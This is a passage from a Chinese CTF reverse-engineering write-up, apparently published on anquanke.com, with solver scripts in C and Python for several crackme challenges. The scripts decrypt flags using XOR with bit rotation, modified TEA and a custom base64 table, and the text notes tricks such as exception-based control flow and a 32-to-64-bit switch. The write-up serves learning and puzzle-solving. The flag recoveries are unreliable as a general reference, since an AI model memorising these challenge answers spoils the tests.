            0x31, 0x36, 0x36, 0x35, 0x30, 0x32, 0x31, 0x63, 0x32, 0x34,
            0x37, 0x36, 0x32, 0x62, 0x36, 0x65, 0x64, 0x61, 0x64, 0x36,
            0x35, 0x63, 0x61, 0x36, 0x33, 0x63, 0x65, 0x61, 0x33, 0x63,
            0x37, 0x32, 0x65, 0x30, 0x64, 0x34, 0x65, 0x34, 0x63, 0x61,
            0x33, 0x66, 0x39, 0x38, 0x33, 0x30, 0x31, 0x31, 0x37, 0x33,
            0x65, 0x65, 0x63, 0x33, 0x32, 0x35, 0x34, 0x33, 0x33, 0x37,
            0x61, 0x66, 0x31, 0x66, 0x35, 0x61, 0x31, 0x31, 0x66, 0x37,
            0x37, 0x39, 0x65, 0x63, 0x62, 0x65, 0x30, 0x34, 0x64, 0x31,
            0x62, 0x37, 0x34, 0x64, 0x35, 0x33, 0x66, 0x35, 0x38, 0x33,
            0x35, 0x65, 0x30, 0x31, 0x31, 0x32, 0x32, 0x32, 0x31, 0x35,
            0x35, 0x61, 0x35, 0x36, 0x66, 0x39, 0x37, 0x65, 0x30, 0x30,
            0x64, 0x37, 0x35, 0x33, 0x37, 0x34, 0x63, 0x64, 0x39, 0x33,
            0x30, 0x38, 0x30, 0x64, 0x66, 0x61, 0x30, 0x38, 0x37, 0x63,
            0x64, 0x33, 0x35, 0x36, 0x61, 0x39, 0x39, 0x66, 0x65, 0x31,
            0x65, 0x65, 0x62, 0x66, 0x35, 0x64, 0x36, 0x64, 0x35, 0x65,
            0x33, 0x31, 0x38, 0x34, 0x36, 0x61, 0x61, 0x64, 0x35, 0x32,
            0x35, 0x32, 0x63, 0x33, 0x61, 0x31, 0x37, 0x61, 0x34, 0x36,
            0x35, 0x36, 0x65, 0x32, 0x65, 0x32, 0x31, 0x30, 0x63, 0x65,
            0x31, 0x63, 0x37, 0x61, 0x61, 0x34, 0x64, 0x31, 0x34, 0x37,
            0x66, 0x62, 0x38, 0x63, 0x66, 0x34, 0x34, 0x30, 0x61, 0x35,
            0x30, 0x61, 0x64, 0x64, 0x36, 0x31, 0x62, 0x62, 0x62, 0x32,
            0x65, 0x63, 0x32, 0x39, 0x39, 0x61, 0x32, 0x65, 0x30, 0x64,
            0x61, 0x62, 0x30, 0x62, 0x34, 0x35, 0x30, 0x34, 0x37, 0x39,
            0x36, 0x61, 0x63, 0x33, 0x61, 0x38, 0x39, 0x39, 0x64, 0x61,
            0x35, 0x35, 0x33, 0x61, 0x62, 0x31, 0x64, 0x38, 0x33, 0x35,
            0x37, 0x36, 0x36, 0x39, 0x31, 0x61, 0x62, 0x32, 0x33, 0x34,
            0x30, 0x39, 0x64, 0x31, 0x38, 0x33, 0x39, 0x38, 0x30, 0x31,
            0x34, 0x62, 0x33, 0x62, 0x35, 0x65, 0x61, 0x66, 0x31, 0x32,
            0x65, 0x38, 0x33, 0x66, 0x34, 0x64, 0x39, 0x39, 0x61, 0x61,
            0x30, 0x39, 0x65, 0x31, 0x65, 0x34, 0x65, 0x34, 0x63, 0x61,
            0x65, 0x31, 0x33, 0x33, 0x35, 0x33, 0x30, 0x37, 0x33, 0x30,
            0x63, 0x31, 0x31, 0x33, 0x33, 0x64, 0x61, 0x32, 0x62, 0x33,
            0x64, 0x65, 0x65, 0x33, 0x37, 0x62, 0x35, 0x38, 0x65, 0x62,
            0x31, 0x61, 0x35, 0x37, 0x39, 0x35, 0x62, 0x32, 0x32, 0x31,
            0x65, 0x63, 0x35, 0x61, 0x38, 0x38, 0x33, 0x30, 0x37, 0x33,
            0x31, 0x61, 0x34, 0x31, 0x31, 0x36, 0x37, 0x64, 0x32, 0x39,
            0x35, 0x66, 0x39, 0x65, 0x31, 0x62, 0x30, 0x32, 0x30, 0x33,
            0x30, 0x31, 0x30, 0x30, 0x30, 0x31, 0x33, 0x30, 0x30, 0x64,
            0x30, 0x36, 0x30, 0x39, 0x32, 0x61, 0x38, 0x36, 0x34, 0x38,
            0x38, 0x36, 0x66, 0x37, 0x30, 0x64, 0x30, 0x31, 0x30, 0x31,
            0x30, 0x35, 0x30, 0x35, 0x30, 0x30, 0x30, 0x33, 0x38, 0x32,
            0x30, 0x31, 0x30, 0x31, 0x30, 0x30, 0x30, 0x65, 0x34, 0x37,
            0x34, 0x30, 0x32, 0x33, 0x35, 0x65, 0x39, 0x63, 0x66, 0x32,
            0x62, 0x65, 0x33, 0x33, 0x64, 0x65, 0x33, 0x65, 0x30, 0x36,
            0x64, 0x37, 0x37, 0x37, 0x31, 0x33, 0x39, 0x63, 0x62, 0x62,
            0x63, 0x35, 0x63, 0x66, 0x30, 0x36, 0x32, 0x32, 0x32, 0x38,
            0x35, 0x63, 0x31, 0x37, 0x64, 0x61, 0x30, 0x34, 0x36, 0x39,
            0x37, 0x62, 0x38, 0x30, 0x36, 0x37, 0x33, 0x31, 0x38, 0x61,
            0x61, 0x66, 0x38, 0x64, 0x66, 0x30, 0x66, 0x62, 0x62, 0x34,
            0x64, 0x33, 0x31, 0x36, 0x36, 0x66, 0x32, 0x39, 0x33, 0x65,
            0x61, 0x31, 0x35, 0x61, 0x61, 0x32, 0x35, 0x39, 0x32, 0x66,
            0x30, 0x36, 0x65, 0x62, 0x36, 0x39, 0x32, 0x39, 0x61, 0x66,
            0x30, 0x36, 0x33, 0x37, 0x32, 0x32, 0x61, 0x63, 0x39, 0x66,
            0x33, 0x30, 0x61, 0x64, 0x38, 0x35, 0x65, 0x32, 0x63, 0x30,
            0x38, 0x37, 0x35, 0x36, 0x34, 0x39, 0x33, 0x31, 0x64, 0x36,
            0x61, 0x63, 0x36, 0x35, 0x66, 0x63, 0x64, 0x35, 0x66, 0x62,
            0x63, 0x38, 0x36, 0x34, 0x62, 0x33, 0x64, 0x63, 0x39, 0x38,
            0x34, 0x31, 0x65, 0x30, 0x33, 0x39, 0x63, 0x36, 0x65, 0x31,
            0x64, 0x35, 0x66, 0x62, 0x63, 0x35, 0x63, 0x32, 0x66, 0x38,
            0x61, 0x64, 0x66, 0x39, 0x30, 0x61, 0x35, 0x34, 0x37, 0x62,
            0x63, 0x34, 0x65, 0x62, 0x63, 0x30, 0x37, 0x64, 0x33, 0x38,
            0x37, 0x39, 0x31, 0x34, 0x64, 0x62, 0x32, 0x34, 0x34, 0x35,
            0x31, 0x63, 0x32, 0x63, 0x63, 0x38, 0x39, 0x39, 0x32, 0x35,
            0x33, 0x35, 0x39, 0x62, 0x64, 0x33, 0x62, 0x62, 0x30, 0x37,
            0x35, 0x30, 0x63, 0x37, 0x61, 0x61, 0x62, 0x66, 0x39, 0x64,
            0x37, 0x34, 0x33, 0x62, 0x31, 0x38, 0x39, 0x33, 0x65, 0x39,
            0x38, 0x62, 0x62, 0x63, 0x38, 0x66, 0x66, 0x37, 0x34, 0x62,
            0x32, 0x34, 0x66, 0x63, 0x30, 0x62, 0x34, 0x62, 0x65, 0x32,
            0x64, 0x62, 0x61, 0x61, 0x66, 0x31, 0x63, 0x39, 0x31, 0x37,
            0x62, 0x62, 0x61, 0x30, 0x31, 0x34, 0x39, 0x36, 0x64, 0x30,
            0x36, 0x31, 0x37, 0x66, 0x66, 0x63, 0x33, 0x61, 0x34, 0x61,
            0x38, 0x62, 0x37, 0x61, 0x36, 0x65, 0x37, 0x39, 0x61, 0x33,
            0x30, 0x33, 0x36, 0x32, 0x39, 0x38, 0x61, 0x36, 0x65, 0x62,
            0x66, 0x35, 0x37, 0x62, 0x62, 0x30, 0x30, 0x30, 0x30, 0x31,
            0x65, 0x34, 0x33, 0x61, 0x30, 0x62, 0x32, 0x34, 0x32, 0x38,
            0x36, 0x34, 0x65, 0x65, 0x62, 0x62, 0x30, 0x66, 0x63, 0x65,
            0x63, 0x39, 0x65, 0x33, 0x32, 0x33, 0x31, 0x34, 0x34, 0x64,
            0x34, 0x34, 0x34, 0x37, 0x63, 0x38, 0x37, 0x38, 0x34, 0x33,
            0x30, 0x66, 0x31, 0x38, 0x65, 0x36, 0x65, 0x33, 0x35, 0x38,
            0x61, 0x64, 0x39, 0x37, 0x35, 0x36, 0x36, 0x66, 0x61, 0x30,
            0x34, 0x64, 0x31, 0x66, 0x30, 0x37, 0x62, 0x31, 0x37, 0x31,
            0x63, 0x31, 0x34, 0x37, 0x36, 0x63, 0x39, 0x61, 0x66, 0x35,
            0x61, 0x31, 0x65, 0x62, 0x61, 0x30, 0x62, 0x66, 0x36, 0x36,
            0x31, 0x36, 0x65, 0x32, 0x31, 0x39, 0x63, 0x30, 0x62, 0x39,
            0x65, 0x31, 0x32, 0x39, 0x39, 0x64, 0x30, 0x39, 0x66, 0x65,
            0x63, 0x64, 0x65, 0x64, 0x32, 0x34, 0x61, 0x38, 0x38, 0x30,
            0x33, 0x39, 0x37, 0x66, 0x39, 0x32, 0x65, 0x30, 0x66, 0x39,
            0x39, 0x64, 0x38, 0x39, 0x35, 0x31, 0x32, 0x32, 0x38, 0x63,
            0x37, 0x37, 0x37, 0x30, 0x63, 0x31, 0x38, 0x34, 0x66, 0x64,
            0x37, 0x37, 0x61, 0x64, 0x66, 0x66, 0x39, 0x34, 0x33, 0x62,
            0x66, 0x63, 0x38, 0x62, 0x36, 0x61, 0x61, 0x35, 0x32, 0x34,
            0x63, 0x35, 0x66, 0x30, 0x61, 0x36, 0x64, 0x37, 0x36, 0x38,
            0x36, 0x66, 0x65, 0x33, 0x35, 0x34, 0x38, 0x36};
    unsigned char flag[] =
        {
            0xCA, 0xEB, 0x4A, 0x8A, 0x68, 0xE1, 0xA1, 0xEB, 0xE1, 0xEE,
            0x6B, 0x84, 0xA2, 0x6D, 0x49, 0xC8, 0x8E, 0x0E, 0xCC, 0xE9,
            0x45, 0xCF, 0x23, 0xCC, 0xC5, 0x4C, 0x0C, 0x85, 0xCF, 0xA9,
            0x8C, 0xF6, 0xE6, 0xD6, 0x26, 0x6D, 0xAC, 0x0C, 0xAC, 0x77,
            0xE0, 0x64};

    for(i=0;i<42;i++){
        flag[i] = ((flag[i] >> 5) | (flag[i] << 3)) & 0xff;
    }
    for(i=0;i<42;i++){
        flag[i] = flag[i] ^ (sign[327+27*i] + i);
        printf("%c", flag[i]);
    }
    return 0;
}

Hell’s Gate

首先主动触发异常处理程序,然后到达真实的check函数,其中调用了很多奇怪的函数。
通过改cs寄存器,从32位代码执行环境转换到64位。
发现就是个TEA,不过改了下delta。

#include<windows.h>
#include<stdio.h>
#include<stdlib.h>

void decrypt(unsigned int * v, unsigned int * k) 
{
    unsigned int y=v[0],z=v[1],sum=0x879379e0,i;          
    unsigned int delta=0xb879379e;                  
    unsigned int a=k[0],b=k[1],c=k[2],d=k[3];    
    for(i=0;i<16;i++) 
    {                        
        z-=((y<<4)+c)^(y+sum)^((y>>5)+d); 
        y-=((z<<4)+a)^(z+sum)^((z>>5)+b);
        sum-=delta;
    }
    v[0]=y;
    v[1]=z;
}
int main()
{
    unsigned int data[8]={0x2C94650B,0x78494E9E,0x0E7FACF44,0x48F9DBFB,0x547BB145,0x925D2542,0x69A9F4C4,0x9A96A1D8};
    unsigned int key[4]={0x12345678,0x87654321,0x13243546,0x64534231};
    for(int i=0;i<8;i+=2)
    {
        unsigned int *ptr=&(data[i]);
        decrypt(ptr,key);
        unsigned char *o=(unsigned char *)ptr;
        for(int j=0;j<8;j++)
            printf("%c",o[j]);
    }
}

mod

有花指令,去掉即可。
有点类似base64,也是三个字节变换成64个字节,然后表代换。

base64_tbl="ABCDFEGH1JKLRSTMNP0VWQUXY2a8cdefijklmnopghwxyqrstuvzOIZ34567b9+/"
enc="2aYcdfL2fS1BTMMF1RSeMTTASS1OJ8RHTJdBYJ2STJfNMSMAYcKUJddp"
data=[]
for c in enc:
    data.append(base64_tbl.find(c))
ptr=0
flag=""
while ptr<len(data):
    chr0=((data[ptr]<<2)&0xC0)|(data[ptr+1]&0x3)|((data[ptr+2]<<2)&0x30)|(((data[ptr+3]<<2)&0xC0)>>4)
    chr1=((data[ptr]<<2)&0x30)|((data[ptr+1]<<2)&0xC0)|(data[ptr+2]&0x3)|(((data[ptr+3]<<2)&0x30)>>2)
    chr2=(data[ptr]&0x3)|((data[ptr+1]<<2)&0x30)|((data[ptr+2]<<2)&0xC0)|((data[ptr+3]<<2)&0xC)
    flag+=chr(chr0)+chr(chr1)+chr(chr2)
    ptr+=4
print(flag)

ooo

将前4位与“flag”异或,发现异或的值是等差数列,公差为256。

### mod
x=[
  6,
  268,
  513,
  775,
  1051,
  1361,
  1619,
  1798,
  2131,
  2389,
  2646,
  2902,
  3155,
  3405,
  3669,
  3920,
  4097,
  4436,
  4685,
  4948,
  5207,
  5463,
  5634,
  5965,
  6226,
  6487,
  6744,
  6914,
  7245,
  7426,
  7767,
  8017,
  8273,
  8528,
  8786,
  9046,
  9222,
  9478,
  9815,
  9985,
  10244,
  10525]
a1=96
a=[]
for i in range(0,42):
  a.append(a1+256*i)
for i in range(0,42):
    print(chr(x[i]^a[i]),end="")

本文由Retr_0原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/257718

安全客 - 有思想的安全新媒体

分享到:微信
+12赞
收藏
Retr_0
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66